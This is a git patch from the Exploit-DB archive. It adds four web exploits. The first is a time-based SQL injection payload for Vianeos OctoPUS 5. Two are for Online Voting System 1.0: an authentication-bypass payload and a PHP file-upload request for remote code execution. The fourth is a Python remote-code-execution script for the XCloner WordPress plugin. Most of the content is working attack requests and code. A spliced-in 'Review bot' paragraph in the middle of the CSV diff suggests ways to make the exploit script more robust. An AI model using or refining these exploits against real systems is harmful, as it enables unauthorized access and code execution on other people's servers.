From 4f3cf46cbf78f08a03becfaab6ebaf9f9161ff0d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 2 Jul 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-07-02
4 changes to exploits/shellcodes
Online Voting System 1.0 - Authentication Bypass (SQLi)
Online Voting System 1.0 - Remote Code Execution (Authenticated)
Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
Vianeos OctoPUS 5 - 'login_user' SQLi
---
 exploits/multiple/webapps/50078.txt | 19 +++++
 exploits/php/webapps/50075.txt | 35 ++++++++
 exploits/php/webapps/50076.txt | 76 +++++++++++++++++
 exploits/php/webapps/50077.py | 121 ++++++++++++++++++++++++++++
 files_exploits.csv | 4 +
 5 files changed, 255 insertions(+)
 create mode 100644 exploits/multiple/webapps/50078.txt
 create mode 100644 exploits/php/webapps/50075.txt
 create mode 100644 exploits/php/webapps/50076.txt
 create mode 100755 exploits/php/webapps/50077.py
diff --git a/exploits/multiple/webapps/50078.txt b/exploits/multiple/webapps/50078.txt
new file mode 100644
index 000000000..18c35f88f
--- /dev/null
+++ b/exploits/multiple/webapps/50078.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi
+# Date: 01/07/2021
+# Exploit Author: Audencia Business SCHOOL
+# Vendor Homepage: http://www.vianeos.com/en/home-vianeos/
+# Software Link: http://www.vianeos.com/en/octopus/
+# Version: > V5
+# Tested on: Fedora / Apache2 / MariaDB
+
+
+Octopus V5 SQLi
+
+The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow :
+
+```
+Parameter: login_user (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1
+```
\ No newline at end of file
diff --git a/exploits/php/webapps/50075.txt b/exploits/php/webapps/50075.txt
new file mode 100644
index 000000000..bf8bfdd1c
--- /dev/null
+++ b/exploits/php/webapps/50075.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)
+# Exploit Author: deathflash1411
+# Date 30.06.2021
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
+# Version 1.0
+# Tested on: Ubuntu 20.04
+
+####################
+# Proof of Concept #
+####################
+
+POST /Online_voting_system/admin/ HTTP/1.1
+Host: localhost
+Content-Length: 50
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/Online_voting_system/admin/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
+Connection: close
+
+UserName=admin&Password=%27+or+%27%27%3D%27&Login=
+
+###########
+# Payload #
+###########
+
+UserName=admin
+Password=' or ''='
\ No newline at end of file
diff --git a/exploits/php/webapps/50076.txt b/exploits/php/webapps/50076.txt
new file mode 100644
index 000000000..1e378bbd2
--- /dev/null
+++ b/exploits/php/webapps/50076.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated)
+# Exploit Author: deathflash1411
+# Date 30.06.2021
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html
+# Version 1.0
+# Tested on: Ubuntu 20.04
+
+####################
+# Proof of Concept #
+####################
+
+POST /Online_voting_system/admin/save_candidate.php HTTP/1.1
+Host: localhost
+Content-Length: 1253
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/Online_voting_system/admin/new_candidate.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a
+Connection: close
+
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="user_name"
+
+admin
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rfirstname"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rlastname"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rgender"
+
+Male
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="ryear"
+
+1st year
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rmname"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="rposition"
+
+Governor
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="party"
+
+test
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="image"; filename="test.php"
+Content-Type: application/octet-stream
+
+
+
+------WebKitFormBoundary4G9QRpniTS7gPVqW
+Content-Disposition: form-data; name="save"
+
+
+------WebKitFormBoundary4G9QRpniTS7gPVqW--
+
+########
+# Note #
+########
+
+Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/
\ No newline at end of file
diff --git a/exploits/php/webapps/50077.py b/exploits/php/webapps/50077.py
new file mode 100755
index 000000000..174523182
--- /dev/null
+++ b/exploits/php/webapps/50077.py
@@ -0,0 +1,121 @@
+# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)
+# Date 30.06.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.xcloner.com/
+# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip
+# Version: 4.2.1 - 4.2.12
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2020-35948
+# CWE: CWE-732
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md
+
+'''
+Description:
+An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files,
+including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php,
+for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.
+'''
+
+
+'''
+Banner:
+'''
+banner = """
+
+
+ ##### # # ####### ##### ### ##### ### ##### ####### ##### # #####
+ # # # # # # # # # # # # # # # # # # # # # #
+ # # # # # # # # # # # # # # # # # #
+ # # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # #####
+ # # # # # # # # # # # # # ####### # #
+ # # # # # # # # # # # # # # # # # # # #
+ ##### # ####### ####### ### ####### ### ##### ##### ##### # #####
+
+
+
+ by @Hacker5preme
+"""
+print(banner)
+
+
+'''
+Import required modules:
+'''
+import requests
+import argparse
+
+
+'''
+User-Input:
+'''
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+print('')
+ajax_cmd = input('[*] Ajax Command to execute: ')
+
+'''
+Authentication:
+'''
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+
+# Header:
+header = {
+ 'Host': target_ip,
+ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+ 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Origin': 'http://' + target_ip,
+ 'Connection': 'close',
+ 'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+ 'log': username,
+ 'pwd': password,
+ 'wp-submit': 'Log In',
+ 'testcookie': '1'
+}
+
+# Authenticate:
+print('')
+auth = session.post(auth_url, headers=header, data=body)
+auth_header= auth.headers['Set-Cookie']
+if 'wordpress_logged_in' in auth_header:
+ print('[+] Authentication successfull !')
+else:
+ print('[-] Authentication failed !')
+ exit()
+
+
+'''
+Exploit:
+'''
+url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"
+
+header = {
+ "Accept": "*/*",
+ "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",
+ "Connection": "close"
+}
+
+# Body:
+body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)
+
+exploit = session.post(url_exploit, headers=header, data=body)
+print('')
+print(exploit.text)
+print('')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8d9dcac83..a750390d9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
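Review bot: `auth_header= auth.headers['Set-Cookie']` in the Authentication section of this hunk raises KeyError whenever the login response carries no Set-Cookie header, so a rejected login ends in a traceback instead of reaching the `[-] Authentication failed !` branch; `auth_header = auth.headers.get('Set-Cookie', '')` preserves the intended substring check. All five argparse options are optional, so a missing `-T`, `-P` or `-U` leaves `target_ip`, `target_port` or `wp_path` as None and the concatenation that builds `auth_url` fails with TypeError before any request is sent — pass `required=True` to those `add_argument` calls or validate them right after `parse_args()`. `exit()` is the `site` module convenience rather than a language builtin and exits with status 0; `raise SystemExit(1)` is the portable form and reports the failure to the caller. The script is a flat module with no function definitions, so the code these points apply to is the whole of this hunk.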
@@ -44207,9 +44207,13 @@ id,file,description,date,author,type,platform,port
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
+50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",2021-07-01,"Salman Asad",webapps,php,
 50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
 50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
 50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
 50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,
+50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
+50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
+50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,